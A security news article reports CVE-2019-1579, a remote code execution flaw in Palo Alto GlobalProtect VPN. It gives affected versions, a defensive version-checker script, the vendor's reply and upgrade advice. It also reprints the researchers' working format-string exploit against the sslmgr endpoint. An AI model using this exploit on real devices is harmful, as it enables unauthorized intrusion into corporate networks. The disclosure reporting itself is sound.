Security researchers published PoC code for a critical vulnerability in Palo Alto Networks firewalls

Palo Alto Networks has quietly fixed a critical vulnerability in GlobalProtect, the SSL VPN solution built into its firewalls.

Exploiting the vulnerability lets an attacker remotely execute arbitrary code. The flaw (CVE-2019-1579) affects the GlobalProtect solution and the GlobalProtect Gateway interface and can be exploited by an unauthenticated attacker who sends a specially crafted request to the device.

Security researchers Orange Tsai and Meh Chang discovered the bug.

“We surveyed all Palo Alto SSL VPNs over the world to see if there are any large corporations using the vulnerable GlobalProtect, and Uber is one of them!”, the researchers said.

Uber responded very quickly and took the right steps to fix the vulnerability.

Affected versions:

According to the researchers' survey, all GlobalProtect releases before July 2018 are vulnerable. Here is the affected version list:

  • Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
  • Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
  • Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3
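The version list above is easy to misread when a fleet mixes branches and hotfix builds, so here is a small added checker (written for this article, not code from the researchers or from Palo Alto Networks) that classifies a version string against the three fixed releases stated above. It assumes versions look like "8.0.12" or "8.0.12-h1"; branches not on the list (for example 9.0.x) are reported as "not listed" rather than guessed at.

```python
import re
from typing import Dict, List, Optional, Tuple

# First fixed release per affected branch, exactly as the article lists them.
FIXED_IN: Dict[Tuple[int, int], Tuple[int, int, int]] = {
    (7, 1): (7, 1, 19),
    (8, 0): (8, 0, 12),
    (8, 1): (8, 1, 3),
}


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn '8.0.12-h1' into (8, 0, 12); hotfix suffixes such as '-h1' are ignored."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_affected(text: str) -> Optional[bool]:
    """True if the version is below the fix for its branch, False if at or after it,
    None if the branch is not covered by the published list at all."""
    major, minor, patch = parse_version(text)
    fixed = FIXED_IN.get((major, minor))
    if fixed is None:
        return None
    return (major, minor, patch) < fixed


def triage(inventory: Dict[str, str]) -> Dict[str, List[str]]:
    """Group device names by status so the affected ones can go on a patch ticket."""
    out: Dict[str, List[str]] = {"affected": [], "fixed": [], "not_listed": []}
    for host, version in inventory.items():
        status = is_affected(version)
        key = "not_listed" if status is None else ("affected" if status else "fixed")
        out[key].append(host)
    return out


# Constructed sample inventory (hypothetical hostnames and versions).
SAMPLE_INVENTORY = {
    "fw-dc1": "8.0.11",       # below 8.0.12 -> affected
    "fw-dc2": "8.1.3",        # exactly the fix -> fixed
    "fw-branch": "7.1.19-h2", # hotfix of the fixed release -> fixed
    "fw-lab": "9.0.1",        # branch not in the article's list
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status}: {', '.join(hosts) or '-'}")
```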

PoC code:

The researchers published PoC code demonstrating exploitation of the vulnerability.

#!/usr/bin/python

import requests
from pwn import *

url = "https://sslvpn/sslmgr"
cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt"

strlen_GOT = 0x667788 # change me
system_plt = 0x445566 # change me

fmt =  '%70$n'
fmt += '%' + str((system_plt>>16)&0xff) + 'c'
fmt += '%32$hn'
fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c'
fmt += '%24$hn'
for i in range(40,60):
    fmt += '%'+str(i)+'$p'

data = "scep-profile-name="
data += p32(strlen_GOT)[:-1]
data += "&appauthcookie="
data += p32(strlen_GOT+2)[:-1]
data += "&host-id="
data += p32(strlen_GOT+4)[:-1]
data += "&user-email="
data += fmt
data += "&appauthcookie="
data += cmd
r = requests.post(url, data=data)


How to fix?

When the researchers reported the bug to Palo Alto Networks, however, they received the following reply:

“Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know”, Palo Alto Networks commented.

So it seems the vulnerability was already known to Palo Alto Networks, but had not been disclosed to the world.

Administrators are urged to upgrade to PAN-OS 7.1.19 or later, 8.0.12 or later, or 8.1.3 or later.


About the author

Brendan Smith

Cybersecurity analyst with 15+ years digging into malware and threats, from early days reverse-engineering trojans to leading incident responses for mid-sized firms.

At Gridinsoft, I handle peer-reviewed breakdowns of stuff like AsyncRAT ransomware—last year, my guides helped flag 200+ variants in real scans, cutting cleanup time by 40% for users. Outside, I write hands-on tutorials on howtofix.guide, like step-by-step takedowns of pop-up adware using Wireshark and custom scripts (one post on VT alternatives got 5k reads in a month).

Certified CISSP and CEH, I’ve run webinars for 300+ pros on AI-boosted stealers—always pushing for simple fixes that stick, because nobody has time for 50-page manuals. Tools of the trade: Splunk for hunting, Ansible for automation, and a healthy dose of coffee to outlast the night shifts.
